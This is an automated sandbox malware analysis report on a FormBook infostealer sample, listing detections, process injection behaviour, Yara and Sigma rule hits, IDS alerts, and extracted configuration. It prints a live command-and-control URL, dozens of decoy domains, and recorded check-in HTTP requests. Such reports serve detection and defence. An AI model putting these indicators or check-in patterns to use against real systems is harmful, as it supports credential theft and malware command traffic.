Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report PQMW0W5h3X.exe

Overview

General Information

Sample Name:PQMW0W5h3X.exe
Analysis ID:438543
MD5:6b26db585f40e14b00b5adda57e595dd
SHA1:ffbb4390c5cdb9d0aa78061399f5a9993a955dd3
SHA256:8b39bf75ce8ca2ecadafeb01a2ff33fc07419198e5b222bf20385ecbf2da0ff4
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PQMW0W5h3X.exe (PID: 6528 cmdline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: 6B26DB585F40E14B00B5ADDA57E595DD)
    • PQMW0W5h3X.exe (PID: 6608 cmdline: 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: 6B26DB585F40E14B00B5ADDA57E595DD)
  • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • rundll32.exe (PID: 6820 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 7032 cmdline: /c del 'C:\Users\user\Desktop\PQMW0W5h3X.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        0.2.PQMW0W5h3X.exe.22c0000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.PQMW0W5h3X.exe.22c0000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
          Sigma detected: Suspicious Process Start Without DLLShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820
          Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 6820

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PQMW0W5h3X.exeVirustotal: Detection: 17%Perma Link
          Source: PQMW0W5h3X.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.593356978.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594178697.0000000004250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.331749144.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382158559.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.334729011.00000000022C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381684238.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.381493232.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PQMW0W5h3X.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PQMW0W5h3X.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PQMW0W5h3X.exeJoe Sandbox ML: detected
          Source: 0.2.PQMW0W5h3X.exe.22c0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.rundll32.exe.4d4be0.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.1.PQMW0W5h3X.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.rundll32.exe.4ac7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.PQMW0W5h3X.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PQMW0W5h3X.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PQMW0W5h3X.exe, 00000000.00000003.330363976.00000000097A0000.00000004.00000001.sdmp, PQMW0W5h3X.exe, 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PQMW0W5h3X.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: PQMW0W5h3X.exe, 00000002.00000002.382267305.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.355795813.000000000DD20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop esi2_2_00415852
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop ebx2_2_00406A98
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop edi2_2_00415699
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop esi2_1_00415852
          Source: C:\Users\user\Desktop\PQMW0W5h3X.exeCode function: 4x nop then pop ebx2_1_00406A98
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx4_2_02C06A99
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop esi4_2_02C15852
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi4_2_02C15699

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49766 -> 172.67.129.33:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49768 -> 52.79.124.173:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.extinctionbrews.com/dy8g/
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1Host: www.killrstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1Host: www.ivoirepneus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1Host: www.qq66520.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1Host: www.mzyxi-rkah-y.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1Host: www.guys-only.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A== HTTP/1.1Host: www.invisiongc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=cuaraJgkoEfCri9CHpn14TbyfEdnqeu3xvSLUqjD8bR4lpFRWk9obMnQWFhWIe7eI+ID23wHyg==&6l-=6lY0 HTTP/1.1Host: www.killrstudio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=txuHOH5mmlRIAzfI6nqq0ViggBeEQnMt8DQXoVThNh6+jXgye1aguJwAyFZ9eO3q4TbjPHrHlw== HTTP/1.1Host: www.ivoirepneus.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&6l-=6lY0 HTTP/1.1Host: www.extinctionbrews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o1L2qAF92htTMNNUg== HTTP/1.1Host: www.cindywillardrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&6l-=6lY0 HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=w4dga09rndu/01Lv7rTrHKYivge6TkGpvuCog6Ry2v7pCfEqSSJxxgGpUHJ1zZD6cROGeNm54w==&6l-=6lY0 HTTP/1.1Host: www.builtbydawn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=rxSGsMlf+TpCm2paceR4OA9vkYPhboYZiWSl1OoSBIXvvwNRDuCI148weh0JxST9QqctWF9UAQ== HTTP/1.1Host: www.qq66520.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=GqSDmzIjGNxp2FecVmHvyCO88qwvtjnKiC416l48PhUYnL/NIW7nDNxc91PxOE41cEyZFixE4g==&6l-=6lY0 HTTP/1.1Host: www.mzyxi-rkah-y.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUIBKPcHvB2GVYbV9w== HTTP/1.1Host: www.thenorthgoldline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?A4Ll=xnzbbPmlZmYZGqrTQxh0SyAvVYBEHJsgluOUHMC+sqx7GSIQl98agFOAtXHHwP8thCN3RkXuRg==&6l-=6lY0 HTTP/1.1Host: www.guys-only.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dy8g/?6l-=6lY0&A4Ll=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBBJXfdNhkQaXcLrpw== HTTP/1.1Host: www.wideawakemomma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.invisiongc.net
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: PQMW0W5h3X.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: PQMW0W5h3X.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: rundll32.exe, 00000004.00000002.595657754.0000000004C42000.00000004.00000001.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: explorer.exe, 00000003.00000000.353516221.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.337441844.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
